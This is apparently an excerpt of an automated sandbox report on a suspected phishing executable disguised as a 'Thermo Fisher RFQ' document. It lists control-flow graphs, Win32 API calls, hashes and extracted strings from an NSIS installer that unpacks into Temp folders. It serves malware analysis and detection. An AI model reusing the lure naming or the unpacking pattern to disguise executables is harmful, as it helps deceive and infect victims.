404118-404122 261->271 270->252 271->270 278 4042e0-4042e1 274->278 279 4042e3 274->279 275->274 280 4042e5-404313 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404315-404326 SendMessageW 280->281 282 404328 280->282 283 40432e-40436d call 404508 call 403fb5 call 406554 lstrlenW call 406591 SetWindowTextW call 401389 281->283 282->283 283->226 294 404373-404375 283->294 294->226 295 40437b-40437f 294->295 296 404381-404387 295->296 297 40439e-4043b2 DestroyWindow 295->297 296->225 298 40438d-404393 296->298 297->230 299 4043b8-4043e5 CreateDialogParamW 297->299 298->226 300 404399 298->300 299->230 301 4043eb-404442 call 4044d3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->225 301->225 306 404444-404457 ShowWindow call 40451f 301->306 308 40445c 306->308 308->230
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
                                              • ShowWindow.USER32(?), ref: 00404030
                                              • GetWindowLongW.USER32(?,?), ref: 00404042
                                              • ShowWindow.USER32(?,?), ref: 0040405B
                                              • DestroyWindow.USER32 ref: 0040406F
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404088
                                              • GetDlgItem.USER32(?,?), ref: 004040A7
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
                                              • IsWindowEnabled.USER32(00000000), ref: 004040C2
                                              • GetDlgItem.USER32(?,00000001), ref: 0040416D
                                              • GetDlgItem.USER32(?,00000002), ref: 00404177
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404191
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E2
                                              • GetDlgItem.USER32(?,00000003), ref: 00404288
                                              • ShowWindow.USER32(00000000,?), ref: 004042A9
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BB
                                              • EnableWindow.USER32(?,?), ref: 004042D6
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EC
                                              • EnableMenuItem.USER32(00000000), ref: 004042F3
                                              • SendMessageW.USER32(?,?,00000000,00000001), ref: 0040430B
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
                                              • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
                                              • SetWindowTextW.USER32(?,007A1748), ref: 0040435C
                                              • ShowWindow.USER32(?,0000000A), ref: 00404490
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID:
                                              • API String ID: 121052019-0
                                              • Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                              • Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
                                              • Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                              • Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 309 403c26-403c3e call 406948 312 403c40-403c50 call 40649b 309->312 313 403c52-403c89 call 406422 309->313 322 403cac-403cd5 call 403efc call 405f2b 312->322 318 403ca1-403ca7 lstrcatW 313->318 319 403c8b-403c9c call 406422 313->319 318->322 319->318 327 403d67-403d6f call 405f2b 322->327 328 403cdb-403ce0 322->328 334 403d71-403d78 call 406591 327->334 335 403d7d-403da2 LoadImageW 327->335 328->327 329 403ce6-403d0e call 406422 328->329 329->327 336 403d10-403d14 329->336 334->335 338 403e23-403e2b call 40140b 335->338 339 403da4-403dd4 RegisterClassW 335->339 340 403d26-403d32 lstrlenW 336->340 341 403d16-403d23 call 405e50 336->341 353 403e35-403e40 call 403efc 338->353 354 403e2d-403e30 338->354 342 403ef2 339->342 343 403dda-403e1e SystemParametersInfoW CreateWindowExW 339->343 347 403d34-403d42 lstrcmpiW 340->347 348 403d5a-403d62 call 405e23 call 406554 340->348 341->340 346 403ef4-403efb 342->346 343->338 347->348 352 403d44-403d4e GetFileAttributesW 347->352 348->327 357 403d50-403d52 352->357 358 403d54-403d55 call 405e6f 352->358 362 403e46-403e60 ShowWindow call 4068d8 353->362 363 403ec9-403eca call 4056ac 353->363 354->346 357->348 357->358 358->348 370 403e62-403e67 call 4068d8 362->370 371 403e6c-403e7e GetClassInfoW 362->371 366 403ecf-403ed1 363->366 368 403ed3-403ed9 366->368 369 403eeb-403eed call 40140b 366->369 368->354 372 403edf-403ee6 call 40140b 368->372 369->342 370->371 375 403e80-403e90 GetClassInfoW RegisterClassW 371->375 376 403e96-403eb9 DialogBoxParamW call 40140b 371->376 372->354 375->376 380 403ebe-403ec7 call 403b76 376->380 380->346
                                              APIs
                                                • Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,?,?,0040363F,?,?,?,?,?,?,?,?,?), ref: 0040695A
                                                • Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                              • lstrcatW.KERNEL32(1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75F03420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",00008001), ref: 00403CA7
                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75F03420), ref: 00403D27
                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403D45
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical), ref: 00403D8E
                                                • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                              • RegisterClassW.USER32(007A7200), ref: 00403DCB
                                              • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403DE3
                                              • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E18
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403E4E
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
                                              • GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
                                              • RegisterClassW.USER32(007A7200), ref: 00403E90
                                              • DialogBoxParamW.USER32(?,00000000,00403FD4,00000000), ref: 00403EAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                              • API String ID: 1975747703-4038127305
                                              • Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                              • Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
                                              • Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                              • Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406044 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406554 call 405e6f call 406554 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 398 403135-40314c 395->398 403 403225-403228 396->403 404 403278-40327d 396->404 400 403150-403159 call 4034d1 398->400 401 40314e 398->401 408 40327f-403287 call 40303e 400->408 409 40315f-403166 400->409 401->400 406 40322a-403242 call 4034e7 call 4034d1 403->406 407 40324c-403276 GlobalAlloc call 4034e7 call 4032d9 403->407 404->388 406->404 430 403244-40324a 406->430 407->404 434 403289-40329a 407->434 408->404 412 4031e2-4031e6 409->412 413 403168-40317c call 405fff 409->413 417 4031f0-4031f6 412->417 418 4031e8-4031ef call 40303e 412->418 413->417 432 40317e-403185 413->432 425 403205-40320d 417->425 426 4031f8-403202 call 406a35 417->426 418->417 425->398 433 403213 425->433 426->425 430->404 430->407 432->417 436 403187-40318e 432->436 433->396 437 4032a2-4032a7 434->437 438 40329c 434->438 436->417 439 403190-403197 436->439 440 4032a8-4032ae 437->440 438->437 439->417 442 403199-4031a0 439->442 440->440 441 4032b0-4032cb SetFilePointer call 405fff 440->441 445 4032d0 441->445 442->417 444 4031a2-4031c2 442->444 444->404 446 4031c8-4031cc 444->446 445->388 447 4031d4-4031dc 446->447 448 4031ce-4031d2 446->448 447->417 449 4031de-4031e0 447->449 448->433 448->447 449->417
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 004030B3
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,00000400), ref: 004030CF
                                                • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00406048
                                                • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 0040311B
                                              • GlobalAlloc.KERNELBASE(?,?), ref: 00403251
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$;$;
                                              • API String ID: 2803837635-2237357579
                                              • Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                              • Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
                                              • Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                              • Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 735 406591-40659a 736 40659c-4065ab 735->736 737 4065ad-4065c7 735->737 736->737 738 4067d7-4067dd 737->738 739 4065cd-4065d9 737->739 741 4067e3-4067f0 738->741 742 4065eb-4065f8 738->742 739->738 740 4065df-4065e6 739->740 740->738 744 4067f2-4067f7 call 406554 741->744 745 4067fc-4067ff 741->745 742->741 743 4065fe-406607 742->743 746 4067c4 743->746 747 40660d-406650 743->747 744->745 749 4067d2-4067d5 746->749 750 4067c6-4067d0 746->750 751 406656-406662 747->751 752 406768-40676c 747->752 749->738 750->738 753 406664 751->753 754 40666c-40666e 751->754 755 4067a0-4067a4 752->755 756 40676e-406775 752->756 753->754 761 406670-40668e call 406422 754->761 762 4066a8-4066ab 754->762 757 4067b4-4067c2 lstrlenW 755->757 758 4067a6-4067af call 406591 755->758 759 406785-406791 call 406554 756->759 760 406777-406783 call 40649b 756->760 757->738 758->757 774 406796-40679c 759->774 760->774 773 406693-406696 761->773 763 4066ad-4066b9 GetSystemDirectoryW 762->763 764 4066be-4066c1 762->764 769 40674b-40674e 763->769 770 4066d3-4066d7 764->770 771 4066c3-4066cf GetWindowsDirectoryW 764->771 775 406760-406766 call 406802 769->775 776 406750-406753 769->776 770->769 777 4066d9-4066f7 770->777 771->770 773->776 778 40669c-4066a3 call 406591 773->778 774->757 779 40679e 774->779 775->757 776->775 780 406755-40675b lstrcatW 776->780 782 4066f9-4066ff 777->782 783 40670b-406717 call 406948 777->783 778->769 779->775 780->775 788 406707-406709 782->788 791 40671f-406723 783->791 788->783 790 406745-406749 788->790 790->769 792 406725-406738 SHGetPathFromIDListW CoTaskMemFree 791->792 793 40673a-406743 791->793 792->790 792->793 793->777 793->790
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066B3
                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,?,?,00000000,00000000,0079A700,75F023A0), ref: 004066C9
                                              • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406727
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406730
                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,?,?,00000000,00000000,0079A700,75F023A0), ref: 0040675B
                                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,?,?,00000000,00000000,0079A700,75F023A0), ref: 004067B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 4024019347-4058228671
                                              • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                              • Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
                                              • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                              • Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 794 401794-4017b9 call 402dcb call 405e9a 799 4017c3-4017d5 call 406554 call 405e23 lstrcatW 794->799 800 4017bb-4017c1 call 406554 794->800 805 4017da-4017db call 406802 799->805 800->805 809 4017e0-4017e4 805->809 810 4017e6-4017f0 call 4068b1 809->810 811 401817-40181a 809->811 818 401802-401814 810->818 819 4017f2-401800 CompareFileTime 810->819 813 401822-40183e call 406044 811->813 814 40181c-40181d call 40601f 811->814 821 401840-401843 813->821 822 4018b2-4018db call 4055d9 call 4032d9 813->822 814->813 818->811 819->818 824 401894-40189e call 4055d9 821->824 825 401845-401883 call 406554 * 2 call 406591 call 406554 call 405bb4 821->825 836 4018e3-4018ef SetFileTime 822->836 837 4018dd-4018e1 822->837 834 4018a7-4018ad 824->834 825->809 858 401889-40188a 825->858 838 402c58 834->838 840 4018f5-401900 CloseHandle 836->840 837->836 837->840 844 402c5a-402c5e 838->844 842 401906-401909 840->842 843 402c4f-402c52 840->843 846 40190b-40191c call 406591 lstrcatW 842->846 847 40191e-401921 call 406591 842->847 843->838 853 401926-4023bd 846->853 847->853 856 4023c2-4023c7 853->856 857 4023bd call 405bb4 853->857 856->844 857->856 858->834 859 40188c-40188d 858->859 859->824
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards,?,?,00000031), ref: 004017D5
                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards,?,?,00000031), ref: 004017FA
                                                • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,?,0000000A,?), ref: 00406561
                                                • Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                • Part of subcall function 004055D9: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,0040341A,0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0), ref: 00405634
                                                • Part of subcall function 004055D9: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll), ref: 00405646
                                                • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards$C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp$C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll$Call
                                              • API String ID: 1941528284-2595573383
                                              • Opcode ID: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
                                              • Instruction ID: 1e9ca80c6a5dacc7cd580e770cf15d3f22a044297d5b9cee136244b7a600bee5
                                              • Opcode Fuzzy Hash: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
                                              • Instruction Fuzzy Hash: C441E871400104BADF11BBB5DD85DBE3AB5EF45329B21823FF012B10E1DB3C8A91966D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 860 4055d9-4055ee 861 4055f4-405605 860->861 862 4056a5-4056a9 860->862 863 405610-40561c lstrlenW 861->863 864 405607-40560b call 406591 861->864 866 405639-40563d 863->866 867 40561e-40562e lstrlenW 863->867 864->863 869 40564c-405650 866->869 870 40563f-405646 SetWindowTextW 866->870 867->862 868 405630-405634 lstrcatW 867->868 868->866 871 405652-405694 SendMessageW * 3 869->871 872 405696-405698 869->872 870->869 871->872 872->862 873 40569a-40569d 872->873 873->862
                                              APIs
                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                              • lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,0040341A,0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0), ref: 00405634
                                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll), ref: 00405646
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
